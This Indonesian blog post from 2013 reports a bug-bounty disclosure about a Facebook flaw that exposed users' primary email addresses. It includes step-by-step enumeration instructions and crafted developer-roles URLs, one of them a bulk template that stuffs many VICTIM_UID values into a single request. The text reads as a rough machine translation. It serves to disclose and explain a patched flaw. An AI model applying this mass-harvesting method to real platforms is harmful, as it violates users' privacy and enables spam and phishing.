want to advertise here $100 / views

Jul 21, 2013

hack Lain Facebook mengekspos alamat email pengguna facebook primer

Pekan lalu kami menjelaskan kerentanan kritis di Facebook yang mengungkapkan alamat email utama pengguna facebook. Kemudian bug ditambal oleh Tim Keamanan Facebook.

Hari lain yang serupa yang menarik hack Facebook diungkapkan oleh bug lain pemburu, Roy Castillo. Di blog-nya ia menjelaskan sebuah metode baru hack facebook yang memungkinkan orang untuk ambil alamat email utama miliaran pengguna Facebook dengan mudah.

Facebook Menyediakan App Dashboard untuk membuat dan mengelola aplikasi Facebook Anda, dengan berbagai alat untuk membantu Anda mengkonfigurasi, membangun dan debug aplikasi Facebook Anda.

Cacat ada dalam pengaturan App, di mana admin aplikasi dapat menambahkan profil pengembang juga, tetapi jika pengguna bukan pengguna diverifikasi, sebuah pesan error pada halaman akan mengungkapkan alamat email utamanya.

Menggunakan langkah-langkah yang disebutkan berikut, salah satu bisa ambil alamat email dari semua pengguna facebook:
  1. Mengumpulkan link profil semua pengguna facebook dari Facebook People Directory yaitu http://www.facebook.com/directory/people/
  2. Kumpulkan numerik ID Facebook untuk setiap Profil dari facebook Graph API yaitu http://graph.facebook.com/mohitkumar.thehackernews where extracted user ID is 1251386282
  3. Buat Aplikasi Facebook --> Pergi ke Settings --> Peran Pengembang dan menambahkan mencoba untuk menambahkan profil Pengembang, jika ID validnya, aplikasi akan menerima bahwa, jika tidak pesan kesalahan akan menampilkan alamat email profil itu.
  4. Untuk menyerahkan ID profil langsung dari parameter URL: https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID
facebbok
Dimana APPLICATION_ID adalah ID aplikasi dan VICTIM_UID adalah id numerik profil facebook dikumpulkan dari langkah 2.

Untuk mengirimkan profil lebih dalam jumlah besar:

https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10

dan sebagainya ...
facebook
Dengan cara ini penyerang dapat membuang alamat email utama dari sejumlah pengguna facebook sekaligus. Namun dilaporkan tim keamanan facebook oleh Roy dan ia dihargai dengan $ 4500 di bawah program karunia bug.

S0urcces :The Hacker News

Artikel Terkait

0komentar:

Post a Comment